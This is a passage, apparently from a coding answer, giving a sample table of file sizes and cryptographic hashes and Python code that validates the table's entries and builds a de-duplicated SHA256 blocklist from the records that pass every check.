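SHA512e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998
-
Filesize: 6KB
MD5: fd55948dc6d984a216e62bbba4c84301
SHA1: abec860c0605d808392525f50ee072365d652e8a
SHA256: fa0964c189ec3ec87a3f179fa667ffe5e9320b80fb7ea10a14ecb2baa3a952d2
SHA512: c7331f216f75927f03d08d225b7d7a461f7c405fe50f1077f2a5bff1aa821f657ab0a9da717a77f796f5fab2788500638987e7b98b23fef25b7a75dbb6a858f7
-
Filesize
16.1MB
MD51e79b60d975dc664b5affeab606a41fb
SHA119f9d849813263e2271af58cf8784ef0fce7ae8e
SHA256b2bdaf007e47f5a4eca9248a1bec1aac17c381c0ee6c160709c0226ec8a66c37
SHA512f2d39968a61d74aa7b282da39cdf6e3282ff05a78449380fc71421c88ba752376aaebc0fa34e5a707bfabcdaa91c526da623a2e5feb0369db9b677a263607b46
-
Filesize
1KB
MD5d41d8cd98f00b204e9800998ecf8427e
SHA256deadbeef
"""


@dataclass
class Artifact:
    size_bytes: Optional[int]
    hashes: dict = field(default_factory=dict)
    problems: list = field(default_factory=list)

    def ok(self) -> bool:
        return self.size_bytes is not None and not self.problems


def parse_size(text: str) -> int:
    """'152B' -> 152, '6KB' -> 6144, '1.3MB' -> 1363148 (truncated to whole bytes)."""
    m = _SIZE_LINE.match(text.strip())
    if not m:
        raise ValueError(f'unrecognised size: {text!r}')
    return int(float(m.group(1)) * _UNIT[m.group(2).upper()])


def parse_downloads(text: str) -> list:
    """Split the table into Artifact records, recording every defect instead of raising."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith('filesize'):
            current = Artifact(size_bytes=None)
            records.append(current)
            rest = line[len('filesize'):].lstrip(': ').strip()
            if rest:
                current.size_bytes = parse_size(rest)
            continue
        if current is None or not line or line == '-':
            continue  # separators and anything before the first record
        if current.size_bytes is None:
            current.size_bytes = parse_size(line)
            continue
        m = _HASH_LINE.match(line)
        if not m:
            current.problems.append(f'unexpected line: {line}')
            continue
        algo, digest = m.group(1).upper(), m.group(2).lower()
        if not re.fullmatch(r'[0-9a-f]+', digest):
            current.problems.append(f'{algo} is not hex: {digest}')
        elif len(digest) != DIGEST_LENGTHS[algo]:
            current.problems.append(f'{algo} has {len(digest)} hex chars, expected {DIGEST_LENGTHS[algo]}')
        current.hashes[algo] = digest
    for rec in records:
        for algo in DIGEST_LENGTHS:
            if algo not in rec.hashes:
                rec.problems.append(f'{algo} missing')
    return records


def sha256_blocklist(artifacts) -> list:
    """Sorted, de-duplicated SHA256 values from records that passed every check."""
    return sorted({a.hashes['SHA256'] for a in artifacts if a.ok()})


if __name__ == '__main__':
    arts = parse_downloads(SAMPLE_TEXT)
    for a in arts:
        print(a.size_bytes, a.hashes.get('SHA256'), a.problems or 'ok')
    print(sha256_blocklist(arts))
```

Paste the whole Downloads section into SAMPLE_TEXT's place (or read it from a file) and the function returns the clean SHA256 set; records with problems are kept in the output so you can see what was dropped rather than silently losing them.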